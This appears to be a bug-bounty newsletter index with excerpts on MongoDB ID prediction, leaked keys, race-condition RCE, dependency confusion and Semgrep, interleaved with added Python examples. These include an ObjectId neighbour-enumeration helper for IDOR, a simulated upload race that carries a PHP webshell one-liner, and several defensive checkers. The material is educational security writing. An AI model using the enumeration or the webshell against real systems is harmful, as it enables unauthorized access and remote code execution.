MongoDB ID
MongoDB is a document-oriented database, also known as a NoSQL database. By default, objects are identified by 12-byte IDs. That is far too large a space to brute-force, but those identifiers are not random. They are built like this: 4-byte value...
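The excerpt above stops just as it starts describing the ObjectId layout. As an added example (not from the original post), here is a small Python script that splits an ObjectId into its fields and then enumerates the IDs a neighbouring document created by the same server process would have; the sample ID is constructed and the field layout in the comments is the one from the MongoDB ObjectId specification, not something the excerpt states:

```python
from datetime import datetime, timezone

# MongoDB ObjectId layout (12 bytes, shown as 24 hex chars):
#   bytes 0-3   big-endian Unix timestamp (seconds) of creation
#   bytes 4-8   5-byte value that stays fixed for the generating process
#               (older drivers: 3-byte machine id + 2-byte pid; newer: random per process)
#   bytes 9-11  big-endian counter, incremented by one per generated ObjectId
COUNTER_MAX = 1 << 24


def parse_object_id(oid_hex):
    """Split an ObjectId into its three fields; raises on malformed input."""
    raw = bytes.fromhex(oid_hex)
    if len(raw) != 12:
        raise ValueError("ObjectId must be exactly 12 bytes")
    timestamp = int.from_bytes(raw[0:4], "big")
    return {
        "timestamp": timestamp,
        "created": datetime.fromtimestamp(timestamp, timezone.utc).isoformat(),
        "process": raw[4:9].hex(),
        "counter": int.from_bytes(raw[9:12], "big"),
    }


def build_object_id(timestamp, process_hex, counter):
    """Inverse of parse_object_id: assemble the 24-hex-char string from its fields."""
    return (timestamp.to_bytes(4, "big")
            + bytes.fromhex(process_hex)
            + (counter % COUNTER_MAX).to_bytes(3, "big")).hex()


def neighbour_ids(oid_hex, before=3, after=3, seconds=0):
    """Candidate ObjectIds for documents created by the same process around the
    leaked one: same process field, counter within -before..+after, timestamp
    within +-seconds. This is the whole search space an attacker has to cover
    for an IDOR against predictable ObjectIds: a handful of requests, not 2^96."""
    fields = parse_object_id(oid_hex)
    candidates = []
    for dt in range(-seconds, seconds + 1):
        for dc in range(-before, after + 1):
            if dt == 0 and dc == 0:
                continue  # that is the leaked ID itself
            counter = fields["counter"] + dc
            if not 0 <= counter < COUNTER_MAX:
                continue
            candidates.append(build_object_id(fields["timestamp"] + dt,
                                              fields["process"], counter))
    return candidates


# Constructed sample ID (hypothetical, not taken from any real database).
LEAKED_ID = "5f1d7f3e1c9d44a2b300000a"

if __name__ == "__main__":
    print(parse_object_id(LEAKED_ID))
    for candidate in neighbour_ids(LEAKED_ID, before=2, after=2, seconds=1):
        print(candidate)
```

The practical check: if an application exposes one ObjectId and the documents you care about were created by the same instance around the same time, try the neighbouring counter values first and widen the timestamp window only if needed.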
Articles by Issue
Bug Hunter recorded himself finding $10k SSRF in Google
David Schütz, the first guest of my BBRD podcast and the reporter of two vulnerabilities covered on my channel, had the idea to record himself while bug hunting on Google. He did, and he captured the whole process of finding and escalating an SSRF in Google. We...
The best no bulls**t advice for getting into cybersec
BasteG0d69 created a video "The MOST IMPORTANT advice for young hackers". At first, I thought it might be one of many such videos. However, I've watched it, and this one is the best I've seen. He's really concise, straightforward and gets the...
How to identify the impact of a leaked private key?
Truffle Security, the company behind the secret scanning tool truffleHog, created another tool: Driftwood. You can use it to identify the impact of a leaked private key. It's useful because the impact of a leaked private key is not as easy to check as, for example, that of a...
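Driftwood's source is not on this page; the core idea of any such tool is that a private key blob already contains its public half, so you derive the public key and look it up wherever public keys are visible (TLS certificates, authorized SSH keys, JWKS endpoints). As an added example, not Driftwood's code, here is that matching step in pure Python over PKCS#1 DER, using toy-sized RSA keys constructed inline; the key labels and the "known public keys" set are hypothetical:

```python
import hashlib

# --- minimal DER encode/decode: only INTEGER and SEQUENCE, which is all that
# --- PKCS#1 RSAPrivateKey / RSAPublicKey use ----------------------------------

def _der_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def der_integer(value):
    # one extra byte keeps the sign bit clear; this is the minimal encoding for value >= 0
    body = value.to_bytes(value.bit_length() // 8 + 1, "big")
    return b"\x02" + _der_len(len(body)) + body

def der_sequence(*children):
    body = b"".join(children)
    return b"\x30" + _der_len(len(body)) + body

def der_decode(data):
    """Parse one DER TLV and return (value, remaining_bytes).
    SEQUENCE decodes to a list, INTEGER to an int; anything else is rejected."""
    tag, length, pos = data[0], data[1], 2
    if length & 0x80:                      # long-form length
        n_bytes = length & 0x7F
        length = int.from_bytes(data[pos:pos + n_bytes], "big")
        pos += n_bytes
    body, rest = data[pos:pos + length], data[pos + length:]
    if tag == 0x02:
        return int.from_bytes(body, "big", signed=True), rest
    if tag == 0x30:
        items = []
        while body:
            item, body = der_decode(body)
            items.append(item)
        return items, rest
    raise ValueError("unsupported DER tag 0x%02x" % tag)

# --- PKCS#1 structures ---------------------------------------------------------

def rsa_private_key_der(n, e, d, p, q):
    """RSAPrivateKey ::= SEQUENCE { version, n, e, d, p, q, dP, dQ, qInv }"""
    return der_sequence(der_integer(0), der_integer(n), der_integer(e), der_integer(d),
                        der_integer(p), der_integer(q), der_integer(d % (p - 1)),
                        der_integer(d % (q - 1)), der_integer(pow(q, -1, p)))

def rsa_public_key_der(n, e):
    """RSAPublicKey ::= SEQUENCE { n, e }"""
    return der_sequence(der_integer(n), der_integer(e))

def public_from_private(private_der):
    """The public key is just fields 1 (n) and 2 (e) of the private key."""
    fields, _ = der_decode(private_der)
    return rsa_public_key_der(fields[1], fields[2])

def fingerprint(public_der):
    return hashlib.sha256(public_der).hexdigest()

def match_leaked_key(private_der, known_public_keys):
    """Return the labels of known public keys that the leaked private key controls."""
    leaked_fp = fingerprint(public_from_private(private_der))
    return [label for label, pub in known_public_keys.items() if fingerprint(pub) == leaked_fp]

# Constructed toy keys (textbook sizes, not secure; purely to exercise the code).
LEAKED_PRIVATE = rsa_private_key_der(n=3233, e=17, d=2753, p=61, q=53)
KNOWN_PUBLIC = {
    "api.example.com TLS certificate": rsa_public_key_der(3233, 17),
    "deploy key on ci.example.com": rsa_public_key_der(3127, 3),   # 53*59, unrelated key
}

if __name__ == "__main__":
    print("leaked key controls:", match_leaked_key(LEAKED_PRIVATE, KNOWN_PUBLIC))
```

In practice the "known public keys" set is whatever you can collect: the leaf certificates from Certificate Transparency logs for the organisation's domains, the SSH keys GitHub publishes per user, and any JWKS documents you can reach. A hit against a certificate means the key can impersonate that host; a hit against an SSH key means the key logs in as that user.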
Race condition RCEs
When I say race condition, the first thing that comes to your mind might be redeeming a discount code twice, thus gaining some money. So what on Earth is a race condition RCE? It works best in apps where you can upload an executable file, for example PHP or ASP....
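The excerpt names the setting (an upload of a PHP or ASP file) but not the mechanism. The usual shape is a time-of-check/time-of-use gap: the server writes the upload into the webroot first and only afterwards validates and deletes it, so a request that hits the file inside that window gets it executed. As an added example, not from the original article, the following Python simulation models both the vulnerable flow and the fixed one (validate in quarantine, then publish) with an in-memory "webroot" and a racing fetcher thread; the server class, payload and timings are constructed for the demo:

```python
import threading
import time


class UploadServer:
    """Simulated upload endpoint. self.webroot stands in for the document root:
    anything in it is reachable over HTTP and .php files are 'executed'."""

    def __init__(self, quarantine_first):
        self.webroot = {}
        self.quarantine_first = quarantine_first
        self.lock = threading.Lock()

    def handle_upload(self, filename, content):
        if self.quarantine_first:
            # Fixed: the file only reaches the webroot after the check passes.
            if self._looks_malicious(content):
                return "rejected"
            with self.lock:
                self.webroot[filename] = content
            return "stored"
        # Vulnerable: write first, check later, delete on failure.
        with self.lock:
            self.webroot[filename] = content      # reachable from this moment...
        if self._looks_malicious(content):        # ...until the slow check finishes
            with self.lock:
                self.webroot.pop(filename, None)
            return "rejected"
        return "stored"

    def _looks_malicious(self, content):
        time.sleep(0.05)   # antivirus scan / image re-encode / whatever opens the window
        return b"<?php" in content

    def http_get(self, filename):
        with self.lock:
            content = self.webroot.get(filename)
        if content is None:
            return 404, None
        if filename.endswith(".php"):
            return 200, b"executed: " + content
        return 200, content


def race_upload(server, filename, content):
    """Attacker side: start the upload and hammer GET on the expected URL
    concurrently. Returns the first 200 body seen, or None if the window
    never opened (the upload finished without the file ever appearing)."""
    hits = []
    uploader = threading.Thread(target=server.handle_upload, args=(filename, content))

    def fetcher():
        while True:
            status, body = server.http_get(filename)
            if status == 200:
                hits.append(body)
                return
            if not uploader.is_alive():   # upload done, file never became visible
                return
            time.sleep(0.0005)

    getter = threading.Thread(target=fetcher)
    uploader.start()
    getter.start()
    uploader.join()
    getter.join()
    return hits[0] if hits else None


# Constructed payload: the classic one-line webshell, used only against the simulation.
PAYLOAD = b"<?php system($_GET['cmd']); ?>"


def demo():
    """Returns (result against vulnerable server, result against fixed server)."""
    vulnerable = race_upload(UploadServer(quarantine_first=False), "shell.php", PAYLOAD)
    fixed = race_upload(UploadServer(quarantine_first=True), "shell.php", PAYLOAD)
    return vulnerable, fixed


if __name__ == "__main__":
    print(demo())
```

Against a real target the fetcher is a burst of parallel requests (Burp's Turbo Intruder or a single-packet HTTP/2 attack are the usual tools) because the window is whatever the server's post-upload check takes, and you need a GET to land inside it. The fix that actually closes the window is the one in the `quarantine_first` branch: never place the file under a path the web server will serve until it has been validated and, ideally, renamed to a non-executable extension.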
Session tokens resources
I have a few good resources about different kinds of session cookies, tokens, API keys, or whatever you want to call them. There are many types of bugs you can find there, and they very often have a big impact. Let's start with what types of tokens there even are....
Which CVEs are the hottest?
CVE trends is a fun project that ranks recent CVEs based on how many people talk about them on Twitter. Well, I know that the Twitter audience isn't the most important factor for any vulnerability, but it is an indication of how many people are affected by the bug...
Dependency Confusion POC
Aditya Shende, Bugcrowd top 100, recently gave a talk about dependency confusion at DAMNCON. I don't see many practical articles about this vulnerability class, and many of you have been asking for one. On the slides you can see exactly which steps he took to reproduce the...
WordPress Confusion
WordPress websites use many external plugins and themes. Importantly, they might be hosted in the public WP plugin repository as well as in private ones. That reminds me a bit of the setup for a dependency confusion vulnerability. That's pretty much what...
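Both the dependency confusion entry above and this WordPress one hinge on the same question: for each private package or plugin name, is the same name free on the public registry, and if it is already taken, does the public version outrank the private one? As an added example, not taken from either talk, here is a Python check that answers that for an npm-style dependency list and for a list of plugin slugs; the package names, versions and the "public registry" snapshots are constructed, and the version comparison is the plain numeric-components rule, which is what matters for the confusion case:

```python
import json
import re


def parse_version(version):
    """Numeric components compared left to right, the way a resolver orders
    releases; pre-release/build suffixes are dropped for this comparison."""
    core = re.split(r"[-+]", version, maxsplit=1)[0]
    return tuple(int(part) for part in core.split("."))


def dependencies_from_package_json(text):
    """Merge dependencies and devDependencies of a package.json into {name: version}.
    Range prefixes such as ^ and ~ are stripped; the minimum version is what matters."""
    data = json.loads(text)
    merged = {}
    for section in ("dependencies", "devDependencies"):
        for name, spec in data.get(section, {}).items():
            merged[name] = spec.lstrip("^~>=")
    return merged


def find_confusable(internal, public, scoped_ok=True):
    """internal, public: {name: version}. Returns {name: reason} for every
    internal name an attacker could hijack by publishing it on the public
    registry. npm scoped names (@org/...) are skipped when scoped_ok is True,
    which is only safe if your organisation owns that scope publicly."""
    findings = {}
    for name, version in internal.items():
        if scoped_ok and name.startswith("@"):
            continue
        if name not in public:
            findings[name] = "name is unclaimed on the public registry"
        elif parse_version(public[name]) > parse_version(version):
            findings[name] = "public %s outranks internal %s" % (public[name], version)
    return findings


# Constructed npm-style input: an internal package.json and a snapshot of what
# the public registry already has for those names.
INTERNAL_PACKAGE_JSON = json.dumps({
    "dependencies": {"acme-auth-client": "^2.3.1", "@acme/ui-kit": "1.0.0",
                     "leftpad-fork": "~1.2.0", "acme-logger": "3.0.0"},
    "devDependencies": {"acme-test-utils": "0.9.0"},
})
PUBLIC_NPM = {"leftpad-fork": "9.9.9", "acme-logger": "1.0.0"}

# Constructed WordPress analogue: private plugin slugs versus wordpress.org.
INTERNAL_WP_PLUGINS = {"acme-sso-bridge": "1.4.0", "seo-helper": "2.0.0", "acme-cache": "5.2.0"}
PUBLIC_WP_PLUGINS = {"seo-helper": "3.1.0", "acme-cache": "0.1.0"}


if __name__ == "__main__":
    npm = find_confusable(dependencies_from_package_json(INTERNAL_PACKAGE_JSON), PUBLIC_NPM)
    wp = find_confusable(INTERNAL_WP_PLUGINS, PUBLIC_WP_PLUGINS, scoped_ok=False)
    print("npm:", npm)
    print("wordpress:", wp)
```

The output is an exposure list, not a confirmed vulnerability: whether the public copy actually wins depends on resolver configuration (npm registry scope mappings, pip's `--extra-index-url`, how the site's updater orders its plugin sources). It tells you which names to claim or reserve first.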
Writing custom semgrep rules
Semgrep is a tool for static source code analysis. It supports regex-style patterns, but it also understands the code well enough to catch the same thing written in two different ways. There is a registry of public rules you can use (https://semgrep.dev/r), but it's not...
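Semgrep rules are YAML and its matcher is not reproduced here. To make the point concrete that "understands the code" beats a regex, here is an added Python example (not Semgrep, and not from the original post) that hunts for `subprocess.call(..., shell=True)` two ways: a line regex, and a matcher built on the standard `ast` module that resolves import aliases and ignores layout. The sample source it scans is constructed:

```python
import ast
import re

# Constructed sample: the same dangerous call written four ways, plus one safe call.
SAMPLE = '''
import subprocess
from subprocess import call as run_cmd
import subprocess as sp

subprocess.call("ls " + user_input, shell=True)
sp.call(cmd, shell = True)
run_cmd(cmd,
        shell=True)
subprocess.call(["ls", "-l"])          # safe: no shell
'''

REGEX = re.compile(r"subprocess\.call\(.*shell=True")


def regex_findings(source):
    """Line-oriented regex. Misses the aliased module, the aliased function,
    the extra whitespace around '=', and the call that spans two lines."""
    return [lineno for lineno, line in enumerate(source.splitlines(), 1)
            if REGEX.search(line)]


def qualified_name(func, aliases):
    """Resolve the callee of a Call node to 'module.attr' through known aliases."""
    if isinstance(func, ast.Name):
        return aliases.get(func.id, func.id)
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return aliases.get(func.value.id, func.value.id) + "." + func.attr
    return None


def ast_findings(source):
    """Syntax-aware matcher: same semantics regardless of aliasing or layout."""
    tree = ast.parse(source)
    aliases = {}   # local name -> fully qualified name
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                aliases[alias.asname or alias.name] = alias.name
        elif isinstance(node, ast.ImportFrom):
            for alias in node.names:
                aliases[alias.asname or alias.name] = (node.module or "") + "." + alias.name
    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        if qualified_name(node.func, aliases) != "subprocess.call":
            continue
        for kw in node.keywords:
            if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                hits.append(node.lineno)
    return sorted(hits)


if __name__ == "__main__":
    print("regex found lines:", regex_findings(SAMPLE))
    print("ast found lines:  ", ast_findings(SAMPLE))
```

A Semgrep rule does the alias resolution and whitespace tolerance for you (and adds metavariables, taint tracking and multi-language support), which is exactly why writing rules instead of greps is worth the effort: the regex above finds one of the three dangerous calls, the syntax-aware version finds all three and still skips the safe one.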